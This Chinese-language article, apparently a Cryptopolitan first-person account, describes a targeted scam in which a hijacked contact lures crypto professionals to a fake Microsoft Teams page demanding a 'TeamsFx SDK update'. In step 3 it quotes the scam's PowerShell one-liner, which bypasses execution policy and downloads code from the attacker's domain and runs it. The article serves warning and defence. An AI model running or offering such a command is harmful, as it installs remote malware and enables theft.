tradingkey.logo
搜尋

我差點在微軟Teams通話中被黑客攻擊——以下是騙局運作方式

Cryptopolitan2026年3月1日 09:48
facebooktwitterlinkedin

讓我來告訴你,今天早些時候,我是如何險些成爲一個精心設計的社會工程騙局的受害者的,這個騙局旨在利用像 Microsoft Teams 通話這樣看似無害且平常的事情。. 

在大部分互動過程中,一切似乎都很正常。. 

我以爲是業內人士的人聯繫我,安排在 Microsoft Teams 上開會,我樂於合作,欣然接受了邀請。. 

劇透警告:電話另一端的人是冒充者,他們試圖誘騙我在電腦上運行惡意代碼。. 

我在此講述整個經歷,是爲了提醒加密貨幣和 Web3 社區的朋友、熟人和同行們注意。. 

今天差點輪到我了;明天可能就輪到別人了。. 

第一步:鋪墊——“老朋友,咱們打個電話敘敘舊吧” 

當你收到來自你認識的某位知名加密貨幣公關公司高管的 Telegram 賬號的消息時,你最想不到的就是自己正在落入網絡釣魚陷阱。. 

典型的危險信號當時並未立即顯現。. 

這不是一條隨機的私信。. 

我不是在和一個冒充賬號聊天,那個賬號裏的“i”並沒有被巧妙地替換成“l”。 

我之前還和這個賬號有過聊天記錄,所以我以爲對方真的是本人。. 

從他們開始友好地重新聯繫到彼此,一切都顯得很自然。不久之後,他們就收到了一個Calendly鏈接,用於預約30分鐘的會議,以及一個Microsoft Teams通話邀請。.

正如我之前所說,整個過程中我的警惕性始終很高。我感受到對方展現出的專業精神和耐心,與頂級公關公司高管應有的水準完全一致。. 

我只知道我通過一位行業聯繫人的 Calendly 頁面安排了一場 Teams 會議。.

詐騙者使用被盜賬戶主動聯繫受害者,併發送 Teams 會議鏈接。.

第二步:“僅限桌面端加入”陷阱 

會議當天,我像往常一樣點擊了手機上的Teams會議鏈接,這在以前我至少已經做過上千次了。然而,這次並沒有像往常一樣直接進入會議。屏幕上沒有跳轉到通話界面,而是顯示“由於組織者設置,不允許通過移動設備訪問此會議”。 

“糟了!我以前從來沒遇到過這種情況。” 

嗯,這也不是dent 。. 

事後看來,那可能是第一個真正的危險信號。. 

錯誤頁面是設計的一部分。詐騙分子需要你使用臺式機或筆記本電腦,因爲他們的惡意程序是一個只能在PC上運行的命令行腳本。.

瀏覽器中顯示的網址“ teams.livescalls.com”並非真正的微軟域名。

正規的 Teams 會議使用teams.microsoft.com或teams.live.com。 

從遠處看,“livescalls.com”域名與真正的域名非常接近,但如果你仔細觀察,就會發現它與真正的域名相差甚遠。. 

一個是微軟控制的網站,聲稱擁有超過3.2億日活躍用戶。另一個是攻擊者控制的完全虛假的網站。. 

平心而論,有些組織可能會使用自定義域名進行團隊會議。然而,據世界經濟論壇預測,到2025年,詐騙分子將造成超過1萬億美元的損失,這足以讓我不敢忽視自己的警惕。. 

僞造的“團隊訪問通知”頁面會阻止移動設備訪問,迫使受害者使用臺式電腦運行惡意腳本。請注意其網址:teams.livescalls.com,而非微軟域名。.

騙子在手機版被屏蔽後,會施壓受害者在電腦版上加入,聲稱“合作伙伴正在等着你”。

步驟 3:有效載荷——“更新您的 TeamsFx SDK”

在桌面端啓動後,這個模擬的 Teams 會議頁面設計專業,看起來就像微軟官方文檔裏的內容。它甚至包含了微軟官方的措辭,說明 TeamsFx SDK 將於 2025 年 9 月停止支持。. 

解決方法?複製一段代碼,然後在終端或命令提示符中運行它。.

如果你再用谷歌搜索一下,就會發現確實存在類似的 SDK。只是這次團隊調用不需要它。. 

這段代碼乍看之下無害——它設置了一些聽起來很官方的環境變量,例如 TeamsFx_API_KEY 和 MS_Teams_API_SECRET。但真正的攻擊點就隱藏在這些變量之間,而攻擊者並不指望你能發現這個問題:

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

這一行命令繞過了 PowerShell 安全策略(-ep bypass),從攻擊者的服務器下載代碼,並立即執行它(iex = Invoke-Expression)。. 

就這樣,攻擊者託管的任何惡意軟件、鍵盤記錄器或遠程訪問工具都會悄無聲息地安裝到你的設備上。.

僞造的 Teams 會議界面向參會者展示了惡意的“TeamsFx SDK 更新”頁面。請注意通話中的參會者——這些視頻是由人工智能生成的。.

第四步:“別擔心,很安全”的壓力階段

當我表示對運行腳本猶豫不決時,冒名頂替者立即採取了安撫和施壓相結合的方式。. 

“別擔心,這非常簡單安全”這句話本意是想讓我更容易按照屏幕截圖中的說明在我的電腦上打開命令提示符。. 

“合作伙伴已加入 Zoom”,這句話本意是想讓我感受到壓力,因爲我不會運行簡單的命令提示符,所以不必讓所有人切換平臺。.

我並沒有感到安心,也沒有受到任何壓力。.

當我建議將通話轉移到 Google Meet 時,他們拒絕了。顯然,他們的騙局只能通過他們僞造的 Teams 設置來實施。.

騙子會發送逐步運行惡意代碼的說明,並向受害者保證:“別擔心,這非常簡單,對你來說也很安全。”

第五步:詐唬被識破——屏蔽並刪除

在檢查了腳本和域名後,我證實了我的懷疑:我正遭受社會工程攻擊,並且距離成爲世界經濟論壇 2026 年統計數據的一部分只有幾步之遙。. 

我直接告訴騙子:“我剛剛查過了,這個指令和那個網站都是假的。很遺憾,我沒辦法幫你完成這件事。” 我提出如果他們還想繼續聊,我們可以轉到Google Meet上進行。.

“但會議現在正在進行中,”電話那頭傳來消息。. 

不出所料,他們的回應意在讓我意識到參加電話會議的緊迫性。畢竟,我不想讓所有合作伙伴久等。.

片刻之後,他們刪除了我們所有的通信記錄,並將我拉黑了。. 

啊……這可不僅僅是個危險信號。簡直是驚天動地的大事。. 

商業夥伴不會因爲你質疑軟件更新就刪除所有對話記錄並立即拉黑你。.

騙局被揭穿後,攻擊者堅持說會議“正在進行中”,然後刪除所有消息並拉黑受害者。.

如何保護自己

這種類型的攻擊正在加密貨幣、Web3 和科技行業激增。詐騙分子會入侵或冒充公關人員、投資者和項目負責人的真實賬戶,以高價值人士爲目標。以下是一些防範措施:

  • 切勿在會議頁面運行任何命令。任何正規的視頻通話平臺都不會要求您將代碼粘貼到終端或命令提示符中。
  • 請檢查網址。真正的 Microsoft Teams 會議在 teams.microsoft.com 或 teams.live.com 上進行,而不是“teams.livescalls.com”或任何其他類似的域名。
  • 要警惕“僅限桌面設備”的要求。如果會議限制移動設備訪問,這很可能是故意讓你使用可以執行腳本的電腦。
  • 通過其他渠道覈實對方身份。如果已知的聯繫人向您發送了不尋常的會議鏈接,請直接致電或通過其他平臺發送消息進行確認。
  • 注意“powershell -ep bypass”和“iex”這兩個命令。這是任何腳本中最危險的兩個信號。前者會禁用安全設置,後者會盲目執行下載的代碼。
  • 如果您已經運行了該腳本:請立即斷開網絡連接。運行完整的惡意軟件掃描(例如 Malwarebytes 或 Windows Defender Offline)。使用另一臺乾淨的設備更改所有密碼。監控加密貨幣錢包和銀行賬戶,查看是否存在未經授權的交易。

爲什麼這對加密貨幣和 Web3 很重要

我不會把這稱爲典型的網絡釣魚攻擊,攻擊者不會撒下大網,看看能釣到什麼。. 

不,這是一次有針對性的、持續數天的社會工程攻擊。攻擊者僞裝成業內人士,花了數天時間與你建立聯繫,並通過一個逼真的僞造微軟頁面,在Teams通話中引導你解決技術問題。. 

無論攻擊者竊取你的dent、清空你的加密錢包,還是安裝持久性遠程訪問惡意軟件,他們都將獲益匪淺,而毫無損失。. 

如果你是創始人、投資者,或者任何在加密貨幣和科技領域參與會議的人,請將這篇文章分享給你的團隊。這些騙局的幕後黑手越來越狡猾,唯一的防禦手段就是提高警惕。.

免責聲明:本網站提供的資訊僅供教育和參考之用,不應視為財務或投資建議。

推薦文章

tradingkey.logo
風險提示:我們的網站和行動應用程式僅提供關於某些投資產品的一般資訊。Finsights 不提供財務建議或對任何投資產品的推薦,且提供此類資訊不應被解釋為 Finsights 提供財務建議或推薦。
投資產品存在重大投資風險,包括可能損失投資的本金,且可能並不適合所有人。投資產品的過去表現並不代表其未來表現。
Finsights 可能允許第三方廣告商或關聯公司在我們的網站或行動應用程式的任何部分放置或投放廣告,並可能根據您與廣告的互動情況獲得報酬。
© 版權所有: FINSIGHTS MEDIA PTE. LTD. 版權所有